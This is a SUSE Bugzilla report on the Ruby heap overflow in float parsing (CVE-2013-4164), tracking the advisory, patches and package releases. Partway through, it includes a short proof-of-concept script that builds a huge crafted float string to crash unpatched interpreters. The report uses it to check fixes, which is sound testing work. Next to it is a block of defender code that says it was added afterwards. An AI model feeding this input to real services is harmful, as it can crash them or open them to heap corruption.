Bugzilla – Bug 851803
VUL-0: CVE-2013-4164: ruby/ruby19/ruby20: heap overflow in float point parsing
Last modified: 2014-06-25 17:05:46 UTC
CVE-2013-4164

Heap Overflow in Floating Point Parsing (CVE-2013-4164)

There is an overflow in floating point number parsing in Ruby. This vulnerability has been assigned the CVE identifier CVE-2013-4164.

Details

Any time a string is converted to a floating point value, a specially crafted string can cause a heap overflow. This can lead to a denial of service attack via segmentation faults and possibly arbitrary code execution. Any program that converts input of unknown origin to floating point values (especially common when accepting JSON) is vulnerable.

Vulnerable code looks something like this:

    untrusted_data.to_f

But any code that produces floating point values from external data is vulnerable, such as this:

    JSON.parse untrusted_data

Note that this bug is similar to CVE-2009-0689.

All users running an affected release should upgrade to the fixed versions of ruby.

Affected versions

- All ruby 1.8 versions
- All ruby 1.9 versions prior to ruby 1.9.3 patchlevel 484
- All ruby 2.0 versions prior to ruby 2.0.0 patchlevel 353
- All ruby 2.1 versions prior to ruby 2.1.0 preview1 prior to trunk revision 43780

Solutions

All users are recommended to upgrade to Ruby 1.9.3 patchlevel 484, ruby 2.0.0 patchlevel 353 or ruby 2.1.0 preview2. There is no patch for ruby 1.8.

Credits

Thanks to Charlie Somerville for reporting this issue.

References:
https://www.ruby-lang.org/en/news/2013/11/22/heap-overflow-in-floating-point-parsing-cve-2013-4164/
https://www.ruby-lang.org/en/news/2013/11/22/ruby-1-9-3-p484-is-released/
https://www.ruby-lang.org/en/news/2013/11/22/ruby-2-0-0-p353-is-released/
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-4164
https://bugzilla.redhat.com/show_bug.cgi?id=1033460
The SWAMPID for this issue is 55205. This issue was rated as critical. Please submit fixed packages until 2013-11-26. When done, please reassign the bug to security-team@suse.de. Patchinfo will be handled by security team.
Created attachment 568688 [details] patch for 1.9.3
Created attachment 568690 [details] patch for 2.0.0
Created attachment 568695 [details] patch for 1.8.7
This is an autogenerated message for OBS integration: This bug (851803) was mentioned in
- https://build.opensuse.org/request/show/208068 12.2 / ruby19
- https://build.opensuse.org/request/show/208069 12.3 / ruby19
- https://build.opensuse.org/request/show/208070 13.1 / ruby19
This is an autogenerated message for OBS integration: This bug (851803) was mentioned in https://build.opensuse.org/request/show/208071 13.1 / ruby20
bugbot adjusting priority
Upstream answered our question whether [1] is needed or not: it is not needed, but without the change the bigdecimal library won't pass the test suite. The 1.8 patch already has this change; only the 1.9 and 2.0 patches need to be resubmitted.

[1] https://github.com/ruby/ruby/commit/cf0efb8327d09da9ca6934de525c94bb377ad998
This is an autogenerated message for OBS integration: This bug (851803) was mentioned in https://build.opensuse.org/request/show/208498 12.2 / ruby19
I've applied the patch and sent the submit requests again for ruby19 and ruby20. They should appear as comments in the next few minutes.
This is an autogenerated message for OBS integration: This bug (851803) was mentioned in
- https://build.opensuse.org/request/show/208503 12.3 / ruby19
- https://build.opensuse.org/request/show/208504 13.1 / ruby19
- https://build.opensuse.org/request/show/208505 13.1 / ruby20
Created attachment 569371 [details] foo.rb

Running ruby foo.rb should not cause a segmentation fault? Taken from https://gist.github.com/jacopen/7636018
I've run the following script for the ruby19 package candidates and the script worked as expected (no exploit) for openSUSE 12.2, 12.3 and 13.1:

    #require 'yajl'
    #require 'json'
    #require 'oj'

    def digit_pattern
      # memoised in an instance variable so every caller sees the same pattern
      # (a local ||= inside the method would be re-evaluated on each call)
      @digit_pattern ||= rand(10000).to_s
    end

    def integer_part
      digit_pattern
    end

    # repeat count chosen so the fractional part is roughly 500000 digits long
    def multiplier
      (500000 * (1.0/digit_pattern.size)).to_i
    end

    def fractional_part
      digit_pattern * multiplier
    end

    def evil_float_string
      [integer_part,fractional_part].join('.')
    end

    sploit = '['
    sploit << evil_float_string
    sploit << ']'

    evil_float_string.to_f #UNSAFE
    #JSON.parse sploit #UNSAFE
    #Yajl::Parser.parse sploit #SAFE
    #Oj.load sploit #SAFE
However, it does not work with the ruby20 package candidate. I mean, with the ruby20 package candidate it creates a segmentation fault. Thus ruby20 is not correctly patched.
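Two defender-side checks derived from the advisory at the top of this bug and the test script in the previous comment, as an added example (not code from the bug report, the gist, or the ruby project): vulnerable_ruby? encodes the affected and fixed patchlevels the advisory lists, and safe_to_f bounds the length and shape of a numeric string before String#to_f ever sees it, as a stop-gap on hosts that cannot be upgraded. The function names, the 64-character limit and the sample inputs are assumptions.

```ruby
# Added example for CVE-2013-4164 (not from the bug report, the gist, or ruby itself).
# Fixed patchlevels as listed in the advisory; the 1.8 series has no fix at all.
FIXED_PATCHLEVEL = { "1.9.3" => 484, "2.0.0" => 353 }

# Returns true if an upstream interpreter identified by RUBY_VERSION / RUBY_PATCHLEVEL
# still carries the bug, false if it is a fixed release, and nil where the advisory's
# numbers do not decide it (2.1 previews and trunk, which need the svn revision).
def vulnerable_ruby?(version, patchlevel)
  series = version.split(".")[0, 2].join(".")          # "1.9.3" -> "1.9"
  return true if series == "1.8"                       # every 1.8 release; no patch exists
  return true if series == "1.9" && version != "1.9.3" # 1.9.1/1.9.2: older than 1.9.3p484
  fixed = FIXED_PATCHLEVEL[version]
  return nil if fixed.nil?
  patchlevel < fixed
end

# Assumed bound (not from the advisory): a legitimate decimal float literal is far
# shorter than this, while the crafted strings are hundreds of thousands of digits.
MAX_FLOAT_LITERAL_LEN = 64

# Plain decimal float literal: optional sign, digits, optional fraction and exponent.
FLOAT_LITERAL = /\A[+-]?\d+(\.\d+)?([eE][+-]?\d+)?\z/

# Stop-gap for untrusted input on an unpatched interpreter: only a short, well-formed
# literal is passed to String#to_f; anything else yields nil instead of being parsed.
def safe_to_f(str, max_len = MAX_FLOAT_LITERAL_LEN)
  return nil unless str.is_a?(String)
  s = str.strip
  return nil if s.length > max_len
  return nil unless s =~ FLOAT_LITERAL
  s.to_f
end

# Constructed sample inputs: a normal literal and one shaped like the test script's
# evil_float_string (a digit pattern repeated to roughly 500000 characters).
def demo
  crafted = ["1234", "1234" * 125_000].join(".")
  { normal: safe_to_f("-2.5e3"), crafted: safe_to_f(crafted),
    ruby193_p448: vulnerable_ruby?("1.9.3", 448) }
end

puts demo.inspect if __FILE__ == $0
```

The version check only speaks to upstream version numbers: distribution packages carry backported fixes, so the openSUSE ruby19-1.9.3.p448 and ruby20-2.0.0.p247 packages released in this bug are fixed despite their patchlevels.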
I've found the problem in ruby20 package. I am submitting it again.
This is an autogenerated message for OBS integration: This bug (851803) was mentioned in https://build.opensuse.org/request/show/208840 13.1 / ruby20
We released ruby19 without the incremental fix. We will need to check if it has an impact.
As we did not release ruby19 yet, we will respin it.
Update released for: ruby, ruby-debuginfo, ruby-debugsource, ruby-devel, ruby-doc-html, ruby-doc-ri, ruby-examples, ruby-test-suite, ruby-tk Products: SLE-SERVER 11-SP1-TERADATA (x86_64)
Update released for: ruby, ruby-debuginfo, ruby-debugsource, ruby-devel, ruby-doc-html, ruby-doc-ri, ruby-examples, ruby-test-suite, ruby-tk
Products:
- SLE-DEBUGINFO 11-SP2 (i386, ia64, ppc64, s390x, x86_64)
- SLE-DESKTOP 11-SP2 (i386, x86_64)
- SLE-SDK 11-SP2 (i386, ia64, ppc64, s390x, x86_64)
- SLE-SERVER 11-SP2 (i386, ia64, ppc64, s390x, x86_64)
- SLE-SLMS 1.3 (x86_64)
- SLE-STUDIOONSITE 1.3 (x86_64)
- SLE-WEBYAST 1.3 (i386, ia64, ppc64, s390x, x86_64)
- SLES4VMWARE 11-SP2 (i386, x86_64)
Update released for: ruby, ruby-debuginfo, ruby-debugsource, ruby-devel, ruby-doc-html, ruby-doc-ri, ruby-examples, ruby-test-suite, ruby-tk
Products:
- SLE-DEBUGINFO 11-SP3 (i386, ia64, ppc64, s390x, x86_64)
- SLE-DESKTOP 11-SP3 (i386, x86_64)
- SLE-SDK 11-SP3 (i386, ia64, ppc64, s390x, x86_64)
- SLE-SERVER 11-SP3 (i386, ia64, ppc64, s390x, x86_64)
- SLES4VMWARE 11-SP3 (i386, x86_64)
openSUSE-SU-2013:1834-1: An update that fixes one vulnerability is now available. Category: security (moderate) Bug References: 851803 CVE References: CVE-2013-4164 Sources used: openSUSE 13.1 (src): ruby20-2.0.0.p247-3.7.1
openSUSE-SU-2013:1835-1: An update that fixes one vulnerability is now available. Category: security (moderate) Bug References: 851803 CVE References: CVE-2013-4164 Sources used: openSUSE 13.1 (src): ruby19-1.9.3.p448-2.4.1 openSUSE 12.3 (src): ruby19-1.9.3.p392-1.17.1 openSUSE 12.2 (src): ruby19-1.9.3.p392-3.34.1
assigning back to security team to close the bug.
Update released for: ruby19, ruby19-debuginfo, ruby19-debugsource, ruby19-devel, ruby19-devel-extra, ruby19-doc-ri, ruby19-tk Products: SLE-STUDIOONSITE 1.3 (x86_64)
done
Update released for: ruby, ruby-debuginfo, ruby-debugsource, ruby-devel, ruby-doc-html, ruby-doc-ri, ruby-examples, ruby-test-suite, ruby-tk Products: SLE-DEBUGINFO 11-SP1 (i386, s390x, x86_64) SLE-SERVER 11-SP1-LTSS (i386, s390x, x86_64)
Update released for: ruby, ruby-debuginfo, ruby-debugsource, ruby-devel, ruby-doc-html, ruby-doc-ri, ruby-examples, ruby-test-suite, ruby-tk Products: SLE-DEBUGINFO 11-SP2 (i386, s390x, x86_64) SLE-SERVER 11-SP2-LTSS (i386, s390x, x86_64)
SUSE-SU-2014:0843-1: An update that fixes three vulnerabilities is now available. Category: security (moderate) Bug References: 808137,827265,851803 CVE References: CVE-2013-1821,CVE-2013-4073,CVE-2013-4164 Sources used: SUSE Linux Enterprise Server 11 SP2 LTSS (src): ruby-1.8.7.p357-0.9.15.6
SUSE-SU-2014:0844-1: An update that fixes four vulnerabilities is now available. Category: security (moderate) Bug References: 783525,808137,827265,851803 CVE References: CVE-2012-4481,CVE-2013-1821,CVE-2013-4073,CVE-2013-4164 Sources used: SUSE Linux Enterprise Server 11 SP1 LTSS (src): ruby-1.8.7.p357-0.9.15.6